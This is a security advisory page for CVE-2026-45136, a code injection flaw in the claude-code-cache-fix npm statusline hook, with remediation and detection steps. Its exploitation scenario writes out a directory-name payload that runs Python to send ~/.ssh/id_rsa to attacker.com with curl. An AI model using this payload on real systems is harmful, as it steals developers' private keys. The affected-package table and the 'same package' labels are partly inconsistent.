CVE-2026-45136: claude-code-cache-fix: hook path injection → RCE
GHSA-g3xq-3gmv-qq8g HIGH CISA: TRACK*CVE-2026-45136 is a code injection vulnerability in the npm package claude-code-cache-fix (v3.5.0–v3.5.1), where the statusline hook script interpolates user-controlled filesystem paths directly into a Python triple-quoted string literal — a directory name containing ''' closes the literal early and executes arbitrary Python in the developer's Claude Code process. Any developer running the recommended statusLine configuration is persistently exploitable: the hook fires on every terminal redraw, meaning compromise is sustained without further action after the initial trigger. The delivery vector is frictionless — a hostile directory name lands on disk via routine git clone, npm install, or zip extraction, requiring no privileges or network access beyond what a developer already performs daily. Upgrade to v3.5.2 immediately; if patching is not immediately possible, remove the statusLine entry from ~/.claude/settings.json as a workaround, and rotate all credentials accessible on affected developer machines.
What is the risk?
HIGH. While no remote vector exists, the delivery mechanism is trivial — any git repository, npm package, or archive can plant a hostile directory name. Exploitation requires zero specialized knowledge: crafting the payload is a one-liner, and the attack self-sustains on every terminal redraw without further adversary involvement. The target population is AI developers whose machines hold SSH keys, LLM API tokens (Anthropic, OpenAI), cloud provider credentials, and proprietary model artifacts — extremely high-value targets for supply chain actors. Six prior CVEs exist in the same package, suggesting this tool has a weak security track record.
How does the attack unfold?
What systems are affected?
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| Claude Code | npm | >= 3.5.0, < 3.5.2 | 3.5.2 |
Do you use Claude Code? You're affected.
How severe is it?
What should I do?
5 steps-
Patch: upgrade claude-code-cache-fix to v3.5.2 (published 2026-05-07) — the fix rewrites stdin handling to use a single-quoted heredoc and env var, eliminating shell interpolation entirely.
-
Immediate workaround: remove the statusLine entry from ~/.claude/settings.json to disable the hook until patching is possible.
-
Alternative workaround: replace tools/quota-statusline.sh with the safe heredoc+env-var pattern (export CC_INPUT=$(cat); read JSON via os.environ in Python, never via string interpolation).
-
Detection: run npm list claude-code-cache-fix to identify versions 3.5.0 or 3.5.1; audit ~/.claude/settings.json for statusLine entries pointing to quota-statusline.sh.
-
Incident response: if confirmed vulnerable and timeline is unknown, treat as compromised — rotate SSH keys, all LLM API keys, cloud access tokens, and any credentials stored on the developer machine.
What does CISA's SSVC say?
Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.
How is it classified?
Which compliance frameworks are affected?
This CVE is relevant to:
Frequently Asked Questions
What is CVE-2026-45136?
CVE-2026-45136 is a code injection vulnerability in the npm package claude-code-cache-fix (v3.5.0–v3.5.1), where the statusline hook script interpolates user-controlled filesystem paths directly into a Python triple-quoted string literal — a directory name containing ''' closes the literal early and executes arbitrary Python in the developer's Claude Code process. Any developer running the recommended statusLine configuration is persistently exploitable: the hook fires on every terminal redraw, meaning compromise is sustained without further action after the initial trigger. The delivery vector is frictionless — a hostile directory name lands on disk via routine git clone, npm install, or zip extraction, requiring no privileges or network access beyond what a developer already performs daily. Upgrade to v3.5.2 immediately; if patching is not immediately possible, remove the statusLine entry from ~/.claude/settings.json as a workaround, and rotate all credentials accessible on affected developer machines.
Is CVE-2026-45136 actively exploited?
No confirmed active exploitation of CVE-2026-45136 has been reported, but organizations should still patch proactively.
How to fix CVE-2026-45136?
1. Patch: upgrade claude-code-cache-fix to v3.5.2 (published 2026-05-07) — the fix rewrites stdin handling to use a single-quoted heredoc and env var, eliminating shell interpolation entirely. 2. Immediate workaround: remove the statusLine entry from ~/.claude/settings.json to disable the hook until patching is possible. 3. Alternative workaround: replace tools/quota-statusline.sh with the safe heredoc+env-var pattern (export CC_INPUT=$(cat); read JSON via os.environ in Python, never via string interpolation). 4. Detection: run npm list claude-code-cache-fix to identify versions 3.5.0 or 3.5.1; audit ~/.claude/settings.json for statusLine entries pointing to quota-statusline.sh. 5. Incident response: if confirmed vulnerable and timeline is unknown, treat as compromised — rotate SSH keys, all LLM API keys, cloud access tokens, and any credentials stored on the developer machine.
What systems are affected by CVE-2026-45136?
This vulnerability affects the following AI/ML architecture patterns: AI development environments, Agent frameworks, AI coding assistants.
What is the CVSS score for CVE-2026-45136?
No CVSS score has been assigned yet.
What is the AI security impact?
Affected AI Architectures
MITRE ATLAS Techniques
AML.T0010.001 AI Software AML.T0010.005 AI Agent Tool AML.T0011 User Execution AML.T0050 Command and Scripting Interpreter AML.T0112.000 Local AI Agent Compliance Controls Affected
What are the technical details?
Original Advisory
claude-code-cache-fix is a cache optimization proxy for Claude Code. From 3.5.0 to before 3.5.2, tools/quota-statusline.sh (introduced in v3.5.0) interpolates Claude Code's hook stdin payload directly into a Python triple-quoted string literal. A ''' byte sequence in any user-controlled field of the payload closes the literal early and lets following bytes execute as Python in the user's Claude Code process. This vulnerability is fixed in 3.5.2.
Exploitation Scenario
An attacker contributes to or publishes an open-source AI project (npm package, GitHub repo, or sample dataset archive) that includes a directory named with a crafted payload such as: 'payload_dir/\'''+__import__(\"os\").popen(\"cat ~/.ssh/id_rsa | curl -d @- attacker.com\").read()+\''''. A developer on v3.5.0 or v3.5.1 installs or clones the project as part of normal AI development workflow. The moment the developer navigates their terminal to any workspace where the hostile path appears in cwd, workspace.current_dir, workspace.project_dir, or transcript_path fields of the hook payload, Claude Code fires the statusline hook. Python interprets the injected bytes as code, silently exfiltrates the developer's SSH private key, and the payload continues executing on every subsequent terminal redraw for the entire session.
Weaknesses (CWE)
CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Primary
CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Primary
CWE-94 Improper Control of Generation of Code ('Code Injection')
Primary
CWE-94 Improper Control of Generation of Code ('Code Injection')
Primary
CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') CWE-94 Improper Control of Generation of Code ('Code Injection') CWE-78 — Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection'): The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.
- [Architecture and Design] If at all possible, use library calls rather than external processes to recreate the desired functionality.
- [Architecture and Design, Operation] Run the code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software. OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations. This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise. Be careful to avoid CWE-243 and other weaknesses related to jails.
Source: MITRE CWE corpus.
References
- github.com/advisories/GHSA-g3xq-3gmv-qq8g
- github.com/cnighswonger/claude-code-cache-fix/commit/613e4df30547f3e6baf32d161eddc828f171da17
- github.com/cnighswonger/claude-code-cache-fix/issues/108
- github.com/cnighswonger/claude-code-cache-fix/pull/110
- github.com/cnighswonger/claude-code-cache-fix/security/advisories/GHSA-g3xq-3gmv-qq8g
Timeline
Related Vulnerabilities
CVE-2026-2611 9.6 MLflow: cross-origin bypass enables RCE via AI agent
Same package: claude-code CVE-2026-7574 8.7 Claude Desktop: VM integrity bypass enables RCE
Same package: claude-code CVE-2026-35020 8.4 Claude Code CLI: OS command injection via TERMINAL env
Same package: claude-code CVE-2026-44246 7.2 nnU-Net: prompt injection hijacks CI/CD triage agent
Same package: claude-code CVE-2026-47128 6.1 nono-cli: sandbox escape via Unix socket bypass
Same package: claude-code